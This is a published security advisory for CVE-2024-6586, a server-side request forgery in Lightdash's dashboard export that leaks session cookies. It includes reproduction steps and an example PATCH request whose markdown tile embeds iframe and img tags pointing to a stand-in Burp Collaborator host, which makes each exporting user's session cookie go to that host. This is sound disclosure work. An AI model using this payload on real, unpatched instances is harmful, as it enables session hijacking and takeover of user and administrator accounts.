Skip to content

Lightdash - Server-Side Request Forgery Session Takeover

High
rcorrea35 published GHSA-4h7x-6vxh-7hjf Aug 29, 2024

Package

No package listed

Affected versions

0.1024.6

Patched versions

0.1027.2

Description

Summary

Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting user’s session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.

Severity

HIGH - Exploitation of this vulnerability could lead to user session compromise and allow a threat actor to take over user sessions. If an administrative user is targeted the threat actor could gain administrative control over the Lightdash instance.

Proof of Concept

Exploitation of this vulnerability requires a threat actor to inject HTML elements into a shared dashboard which point to a threat actor controlled source. Any user who exports the dashboard will leak their session token to the threat actor.

Instance 1: Dashboard Generate Preview
Affected Endpoint (Storage of HTML Injection Payload): PATCH /api/v1/dashboards/<DashboardIdentifier>
Affected Parameters (Storage of HTML Injection Payload): content JSON value
Affected Endpoint (SSRF Execution for Token Leakage): POST /api/v1/dashboards/<DashboardIdentifier>/export

Reproduction Steps:

  1. Log into the application with a user that has permissions to create a new dashboard
  2. Create a new markdown dashboard containing HTML injection payloads pointing to Burp Collaborator and save the dashboard
  3. Click on the “Export Dashboard” menu and click “Generate preview”.
  4. Wait for the preview to generate and observe a HTTP request to Burp Collaborator which contains the session cookie for the user who initiated the preview generation.
  5. Share the dashboard with a simulated victim user
  6. Log into the application as a simulated victim user and recreate the steps to generate a preview of the dashboard
  7. Wait for the preview to generate and observe that the simulated victim user’s session cookie was exfiltrated to Burp Collaborator.

A request to inject the required HTML elements is shown below.

PATCH /api/v1/dashboards/<DashboardIdentifier> HTTP/2
Host: lightdash-host
...
Priority: u=1, i
Cache-Control: no-transform

{"tiles":[{"uuid":"<UniqueIdentifier>","x":0,"y":0,"h":9,"w":15,"type":"markdown","properties":{"title":"title","hideTitle":false,"content":"<iframe src=\"<Burp Collaborator URL>\">frame</iframe>\n\n<img src=\"<Burp Collaborator URL>\">img</img>\n"}}],"filters":{"dimensions":[],"metrics":[],"tableCalculations":[]},"name":"my dashboard"}

After injecting a dashboard, exporting it will leak the session token of the exporting user to the injected source. An example HTTP request to export a dashboard is shown below.

POST /api/v1/dashboards/<DashboardIdentifier>/export HTTP/2
Host: lightdash-host
...
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

{"queryFilters":"","gridWidth":1400}

Further Analysis

A threat actor must be authenticated to the application and possess the necessary permissions to create or edit a shared dashboard and inject a payload. Any user exporting the dashboard will trigger the vulnerability and leak their session token. A threat actor could wait for a user to trigger the SSRF during organic application interaction or force the user to perform the action with cross-site scripting, as described in CVE-2024-6585.

Vendor Analysis

The vendor determined that the root cause of this issue was Puppeteer setting sensitive headers + cookies on requests to headless browser. The issue was remediated in version 0.1027.2

Remediation Information

Remediated Version: https://github.com/lightdash/lightdash/releases/tag/0.1027.2
Git Patch: https://patch-diff.githubusercontent.com/raw/lightdash/lightdash/pull/9295.patch
GitHub Pull Request: lightdash/lightdash#9295

Timeline

Date reported: 03/07/2024
Date fixed: 03/8/2024
Date disclosed: 08/30/2024

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

CVE ID

CVE-2024-6586

Weaknesses

Credits